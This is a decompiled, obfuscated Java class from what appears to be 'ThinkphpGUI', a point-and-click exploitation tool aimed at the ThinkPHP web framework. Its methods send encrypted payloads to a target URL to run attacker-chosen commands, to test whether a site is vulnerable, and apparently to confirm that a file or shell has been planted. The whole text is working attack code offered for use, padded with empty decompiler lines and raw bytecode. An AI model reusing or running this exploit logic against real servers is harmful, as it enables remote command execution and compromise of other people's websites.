/*     */ package p;
/*     */ 
/*     */ import com.github.kevinsawicki.http.HttpRequest;
/*     */ import d.cb;
/*     */ import d.gb;
/*     */ import java.util.Iterator;
/*     */ import m.c;
/*     */ import m.j;
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ public class ja
/*     */   implements c
/*     */ {
/*     */   public j ALLATORIxDEMO(String url, String cmd) throws Exception {
/*  40 */     String iiiIiiIiII = (new StringBuilder()).insert(0, url).append(gb.ALLATORIxDEMO("x*$(4t'a4}63#p$aj8f")).toString();
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */     
/*     */     Iterator<?> iterator;
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */     
/* 203 */     while ((iterator = (new oa(this, cmd)).iterator()).hasNext()) { String str = (String)iterator.next();
/*     */       
/*     */       try {
/*     */         String str1 = HttpRequest.post(iiiIiiIiII).send(str).body();
/*     */         
/*     */         String str2;
/*     */         
/* 210 */         if ((str2 = str1.substring(0, str1.indexOf(cb.ALLATORIxDEMO("&")))).equals("")) {
/*     */           return new j(true, "", str1);
/*     */         }
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */         
/*     */         return new j(true, "", str2);
/* 354 */       } catch (Exception str1) {} }
/*     */     
/*     */     return new j(false, null, null);
/*     */   }
/*     */   
/*     */   public j IiIIiIIIii(String url) throws Exception {
/*     */     String iiiIiiIiII = cb.ALLATORIxDEMO("JwJ\037LZhLsPt");
/*     */     String str1 = (new StringBuilder()).insert(0, url).append(gb.ALLATORIxDEMO("x*$(4t'a4}63#p$aj8f")).toString();
/*     */     for (String str : new sa(this)) {
/*     */       try {
/*     */         HttpRequest httpRequest;
/*     */         if ((httpRequest = HttpRequest.post(str1).send(str)).body().contains(iiiIiiIiII))
/*     */           return new j(true, cb.ALLATORIxDEMO("NWsQqoRo:\n4\0174\r)\037H|_"), (new StringBuilder()).insert(0, str1).append(gb.ALLATORIxDEMO("wE8f#/w")).append(str).toString()); 
/*     */       } catch (Exception exception) {
/*     */         exception.printStackTrace();
/*     */       } 
/*     */     } 
/*     */     return new j(false, cb.ALLATORIxDEMO("NWsQqoRo:\n4\0174\r)\037H|_"), "");
/*     */   }
/*     */   
/*     */   public j ALLATORIxDEMO(String url) throws Exception {
/*     */     // Byte code:
/*     */     //   0: new java/lang/StringBuilder
/*     */     //   3: dup
/*     */     //   4: invokespecial <init> : ()V
/*     */     //   7: iconst_0
/*     */     //   8: aload_1
/*     */     //   9: invokevirtual insert : (ILjava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   12: ldc 'x*$(4t'a4}63#p$aj8f'
/*     */     //   14: invokestatic ALLATORIxDEMO : (Ljava/lang/String;)Ljava/lang/String;
/*     */     //   17: invokevirtual append : (Ljava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   20: invokevirtual toString : ()Ljava/lang/String;
/*     */     //   23: astore_2
/*     */     //   24: new p/la
/*     */     //   27: dup
/*     */     //   28: aload_0
/*     */     //   29: invokespecial <init> : (Lp/ja;)V
/*     */     //   32: astore_3
/*     */     //   33: iconst_0
/*     */     //   34: dup
/*     */     //   35: istore #4
/*     */     //   37: aload_3
/*     */     //   38: invokevirtual size : ()I
/*     */     //   41: if_icmpge -> 155
/*     */     //   44: aload_2
/*     */     //   45: invokestatic post : (Ljava/lang/CharSequence;)Lcom/github/kevinsawicki/http/HttpRequest;
/*     */     //   48: aload_3
/*     */     //   49: iload #4
/*     */     //   51: invokevirtual get : (I)Ljava/lang/Object;
/*     */     //   54: checkcast java/lang/CharSequence
/*     */     //   57: invokevirtual send : (Ljava/lang/CharSequence;)Lcom/github/kevinsawicki/http/HttpRequest;
/*     */     //   60: invokevirtual body : ()Ljava/lang/String;
/*     */     //   63: astore #5
/*     */     //   65: new java/lang/StringBuilder
/*     */     //   68: dup
/*     */     //   69: invokespecial <init> : ()V
/*     */     //   72: iconst_0
/*     */     //   73: aload_1
/*     */     //   74: invokevirtual insert : (ILjava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   77: ldc 'jZsNsjWj'
/*     */     //   79: invokestatic ALLATORIxDEMO : (Ljava/lang/String;)Ljava/lang/String;
/*     */     //   82: invokevirtual append : (Ljava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   85: invokevirtual toString : ()Ljava/lang/String;
/*     */     //   88: invokestatic get : (Ljava/lang/CharSequence;)Lcom/github/kevinsawicki/http/HttpRequest;
/*     */     //   91: invokevirtual code : ()I
/*     */     //   94: sipush #200
/*     */     //   97: if_icmpne -> 147
/*     */     //   100: new m/j
/*     */     //   103: dup
/*     */     //   104: iconst_1
/*     */     //   105: new java/lang/StringBuilder
/*     */     //   108: aconst_null
/*     */     //   109: dup_x1
/*     */     //   110: dup
/*     */     //   111: pop2
/*     */     //   112: dup
/*     */     //   113: invokespecial <init> : ()V
/*     */     //   116: aload_1
/*     */     //   117: invokevirtual append : (Ljava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   120: ldc 'xe2|&|ye?ew5wE6f$/'p>d>'
/*     */     //   122: invokestatic ALLATORIxDEMO : (Ljava/lang/String;)Ljava/lang/String;
/*     */     //   125: invokevirtual append : (Ljava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   128: invokevirtual toString : ()Ljava/lang/String;
/*     */     //   131: invokespecial <init> : (ZLjava/lang/String;Ljava/lang/String;)V
/*     */     //   134: areturn
/*     */     //   135: nop
/*     */     //   136: nop
/*     */     //   137: nop
/*     */     //   138: nop
/*     */     //   139: athrow
/*     */     //   140: astore #5
/*     */     //   142: aload #5
/*     */     //   144: invokevirtual printStackTrace : ()V
/*     */     //   147: iinc #4, 1
/*     */     //   150: iload #4
/*     */     //   152: goto -> 37
/*     */     //   155: new m/j
/*     */     //   158: dup
/*     */     //   159: iconst_0
/*     */     //   160: aconst_null
/*     */     //   161: dup
/*     */     //   162: invokespecial <init> : (ZLjava/lang/String;Ljava/lang/String;)V
/*     */     //   165: areturn
/*     */     // Line number table:
/*     */     //   Java source line number -> byte code offset
/*     */     //   #308	-> 0
/*     */     //   #306	-> 24
/*     */     //   #301	-> 33
/*     */     //   #112	-> 44
/*     */     //   #259	-> 65
/*     */     //   #252	-> 94
/*     */     //   #247	-> 100
/*     */     //   #215	-> 136
/*     */     //   #44	-> 140
/*     */     //   #357	-> 142
/*     */     //   #301	-> 147
/*     */     //   #6	-> 155
/*     */     // Local variable table:
/*     */     //   start	length	slot	name	descriptor
/*     */     //   0	166	0	this	Lp/ja;
/*     */     //   0	166	1	url	Ljava/lang/String;
/*     */     //   24	142	2	iiiIiiIiII	Ljava/lang/String;
/*     */     //   33	133	3	iiiIiiIiII	Ljava/util/ArrayList;
/*     */     //   35	127	4	iiiIiiIiII	I
/*     */     //   65	85	5	iiiIiiIiII	Ljava/lang/String;
/*     */     //   142	18	5	iiiIiiIiII	Ljava/lang/Exception;
/*     */     // Exception table:
/*     */     //   from	to	target	type
/*     */     //   44	134	140	java/lang/Exception
/*     */   }
/*     */ }


/* Location:              C:\Users\zyh\Desktop\ThinkphpGUI-1.3-SNAPSHOT.jar!\p\ja.class
 * Java compiler version: 8 (52.0)
 * JD-Core Version:       1.1.3
 */